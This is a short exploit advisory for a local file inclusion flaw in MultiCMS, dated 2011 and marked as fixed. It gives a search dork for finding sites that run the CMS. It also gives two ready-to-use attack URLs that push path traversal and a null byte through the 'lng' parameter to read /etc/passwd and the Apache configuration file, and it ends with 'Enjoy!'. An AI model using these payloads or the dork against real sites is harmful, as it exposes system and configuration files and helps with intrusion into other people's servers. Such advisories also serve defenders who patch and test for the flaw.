[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MultiCMS Local File Inclusion Vulnerbility
# Published : 2011-01-29
# Author : R3VAN_BASTARD
# Previous Title : class.upload.php v 0.30 Remote File Upload Vulnerability
# Next Title : AWCM v2.2 final Local File Inclusion Vulnerability
Source: http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt
???=============================www[dot]Whiteponny[dot]com=============================
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcn?- syst??m MultiCMS"
# Mail: defrontliner@whiteponny.com
================================================================================
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
Enjoy! :D
================================================================================
Thanks To: Madonk "Makasih udah nemenin Scan :D"
S3T4N a.k.a Zeth.
All My Friends
=============================www[dot]Whiteponny[dot]com=============================